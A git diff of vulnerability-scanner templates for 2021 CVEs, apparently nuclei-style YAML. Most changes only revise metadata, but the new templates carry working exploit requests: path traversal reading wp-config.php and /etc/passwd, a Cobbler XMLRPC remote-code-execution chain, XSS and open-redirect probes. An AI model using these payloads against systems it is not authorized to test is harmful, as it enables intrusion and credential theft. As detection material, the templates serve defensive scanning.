CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-38314 - description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." + tags: cve,cve2021,wordpress,wp-plugin requests: - raw: diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml index 95f9b1bee7..58293f9952 100644 --- a/cves/2021/CVE-2021-38540.yaml +++ b/cves/2021/CVE-2021-38540.yaml @@ -4,16 +4,21 @@ info: name: Apache Airflow - Unauthenticated Variable Import author: pdteam severity: critical - description: The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-38540 - tags: cve,cve2021,apache,airflow,rce - metadata: - shodan-query: title:"Sign In - Airflow" + description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38540 + - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E + - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E + remediation: Upgrade to Apache Airflow 2.1.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-38540 cwe-id: CWE-306 + metadata: + shodan-query: title:"Sign In - Airflow" + verified: true + tags: cve,cve2021,apache,airflow,rce requests: - raw: @@ -64,4 +69,7 @@ requests: - type: word words: - - 'You should be redirected automatically to target URL: ' \ No newline at end of file + - 'You should be redirected automatically to target URL: ' + + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index ed29c6ae66..c9b6cc9183 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -1,21 +1,22 @@ id: CVE-2021-38647 info: - name: OMIGOD - Open Management Infrastructure RCE + name: Microsoft Open Management Infrastructure - Remote Code Execution author: daffainfo,xstp severity: critical - tags: cve,cve2021,rce,omi,microsoft - description: Open Management Infrastructure Remote Code Execution Vulnerability + description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi + remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-38647 + tags: cve,cve2021,rce,omi,microsoft requests: - raw: @@ -65,4 +66,6 @@ requests: words: - '' - 'uid=0(root) gid=0(root) groups=0' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index cf51a9d3b3..4c1fde131c 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -1,17 +1,20 @@ id: CVE-2021-38702 info: - name: Cyberoam NetGenie XSS + name: Cyberoam NetGenie Cross-Site Scripting author: geeknik severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. - reference: https://seclists.org/fulldisclosure/2021/Aug/20 - tags: cve,cve2021,cyberoam,netgenie,xss,router + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + reference: + - https://seclists.org/fulldisclosure/2021/Aug/20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 + tags: cve,cve2021,cyberoam,netgenie,xss,router requests: - method: GET @@ -32,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs on 2022/04/01 diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index 9f4942c70c..cfe5058168 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml @@ -1,21 +1,22 @@ id: CVE-2021-38704 info: - name: ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS) + name: ClinicCases 7.3.3 Reflected Cross-Site Scripting author: alph4byt3 severity: medium - description: Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. + description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 + - https://github.com/judsonmitchell/ClinicCases/releases + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-38704 + cwe-id: CWE-79 metadata: shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-38704 - cwe-id: CWE-79 requests: - method: GET @@ -37,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/28 diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index f65c7095ad..84b24e75e3 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -4,20 +4,18 @@ info: name: ExponentCMS <= 2.6 Host Header Injection author: dwisiswant0 severity: medium - description: | - A HTTP Host header attack exists in ExponentCMS 2.6 - and below in /exponent_constants.php. A modified HTTP - header can change links on the webpage to an arbitrary value, - leading to a possible attack vector for MITM. + description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack + vector for MITM. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 - tags: cve,cve2021,exponentcms classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2021-38751 cwe-id: CWE-116 + tags: cve,cve2021,exponentcms requests: - method: GET @@ -39,4 +37,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39226.yaml b/cves/2021/CVE-2021-39226.yaml index 70e9dda091..45283779fc 100644 --- a/cves/2021/CVE-2021-39226.yaml +++ b/cves/2021/CVE-2021-39226.yaml @@ -1,19 +1,22 @@ id: CVE-2021-39226 info: - name: Grafana Snapshot authentication bypass + name: Grafana Snapshot - Authentication Bypass author: Evan Rubinstein - description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accesing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accesing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can delete snapshots by accesing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snappshot/:key, regardless of wether or not the snapshot is set to public mode (disabled by default). Make sure you obtain permission before testing the delete functionality, as this can cause a denial of service. As always, ensure that you test your results manually to ensure your findings are good. Happy Hunting! + severity: high + description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - severity: critical - tags: cve,cve2021,grafana + - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 + - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ + remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 cve-id: CVE-2021-39226 - cwe-id: CWE-200 + cwe-id: CWE-287 + tags: cve,cve2021,grafana requests: - method: GET @@ -28,4 +31,6 @@ requests: - type: word words: - - '"isSnapshot":true' \ No newline at end of file + - '"isSnapshot":true' + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-39312.yaml b/cves/2021/CVE-2021-39312.yaml new file mode 100644 index 0000000000..00063e25cb --- /dev/null +++ b/cves/2021/CVE-2021-39312.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-39312 + +info: + name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal + author: DhiyaneshDK + severity: high + description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file. + reference: + - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 + - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php + remediation: Fixed in version 2.2.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39312 + cwe-id: CWE-22,CWE-22 + tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021 + +requests: + - raw: + - | + POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml index 693e3bd541..220762d7e1 100644 --- a/cves/2021/CVE-2021-39316.yaml +++ b/cves/2021/CVE-2021-39316.yaml @@ -1,19 +1,21 @@ id: CVE-2021-39316 info: - name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download + name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval author: daffainfo severity: high - description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. + description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter. reference: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 - tags: wordpress,cve2021,cve,lfi,wp-plugin + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316 + - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-39316 cwe-id: CWE-22 + tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml index 9c8808cd68..6e634f1073 100644 --- a/cves/2021/CVE-2021-39320.yaml +++ b/cves/2021/CVE-2021-39320.yaml @@ -1,16 +1,17 @@ id: CVE-2021-39320 info: - name: underConstruction < 1.19 - Reflected Cross-Site Scripting + name: WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium - description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path. + description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 tags: wordpress,xss,cve,cve2021,wp-plugin @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39322.yaml b/cves/2021/CVE-2021-39322.yaml new file mode 100644 index 0000000000..80b3ada7a5 --- /dev/null +++ b/cves/2021/CVE-2021-39322.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-39322 + +info: + name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + reference: + - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39322 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml index b98d2b69b6..f78e4f755b 100644 --- a/cves/2021/CVE-2021-39327.yaml +++ b/cves/2021/CVE-2021-39327.yaml @@ -9,12 +9,12 @@ info: - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 - tags: cve,cve2021,wordpress,exposures classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-39327 cwe-id: CWE-200 + tags: cve,cve2021,wordpress,exposures requests: - method: GET @@ -39,3 +39,5 @@ requests: part: header words: - 'text/plain' + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39350.yaml b/cves/2021/CVE-2021-39350.yaml new file mode 100644 index 0000000000..330eb99f1e --- /dev/null +++ b/cves/2021/CVE-2021-39350.yaml @@ -0,0 +1,54 @@ +id: CVE-2021-39350 + +info: + name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected Cross-Site Scripting + author: gy741 + severity: medium + description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + reference: + - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 + - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39350 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "

FV Player Stats

" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39433.yaml b/cves/2021/CVE-2021-39433.yaml new file mode 100644 index 0000000000..bbc07f241b --- /dev/null +++ b/cves/2021/CVE-2021-39433.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-39433 + +info: + name: BIQS IT Biqs-drive v1.83 Local File Inclusion + author: Veshraj + severity: high + description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. + reference: + - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433 + - https://biqs-drive.be/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39433 + tags: lfi,biqsdrive,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml new file mode 100644 index 0000000000..4708455ae9 --- /dev/null +++ b/cves/2021/CVE-2021-39501.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-39501 + +info: + name: EyouCMS 1.5.4 Open Redirect + author: 0x_Akoko + severity: medium + description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function. + reference: + - https://github.com/eyoucms/eyoucms/issues/17 + - https://www.cvedetails.com/cve/CVE-2021-39501 + - https://github.com/KietNA-HPT/CVE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39501 + cwe-id: CWE-601 + tags: cve,cve2021,redirect,eyoucms,cms + +requests: + - method: GET + + path: + - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-40323.yaml b/cves/2021/CVE-2021-40323.yaml new file mode 100644 index 0000000000..c4753930ea --- /dev/null +++ b/cves/2021/CVE-2021-40323.yaml @@ -0,0 +1,99 @@ +id: CVE-2021-40323 + +info: + name: Cobbler <3.3.0 - Remote Code Execution + author: c-sh0 + severity: critical + description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. + reference: + - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 + - https://github.com/cobbler/cobbler/issues/2795 + - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-40323 + cwe-id: CWE-94 + tags: cve,cve2021,cobbler,rce + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + find_profile + + + + + + name + + * + + + + + + + + + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + generate_script + + + + {{profile}} + + + + + + + + + + /etc/passwd + + + + + + extractors: + - type: regex + name: profile + internal: true + group: 1 + regex: + - '(.*?)' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/xml' + + - type: regex + regex: + - "root:.*:0" + - "bin:.*:1" + - "nobody:.*:99" + condition: or + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml index 51d98bbad2..6d8f0e3541 100644 --- a/cves/2021/CVE-2021-40438.yaml +++ b/cves/2021/CVE-2021-40438.yaml @@ -1,30 +1,33 @@ id: CVE-2021-40438 info: - name: Apache <= 2.4.48 - Mod_Proxy SSRF + name: Apache <= 2.4.48 Mod_Proxy SSRF author: pdteam severity: critical - description: A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. + description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. reference: - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - tags: cve,cve2021,ssrf,apache,mod-proxy,oast + remediation: Upgrade to Apache version 2.4.49 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.00 + cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 + tags: cve,cve2021,ssrf,apache,mod-proxy requests: - method: GET path: - - '{{BaseURL}}/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA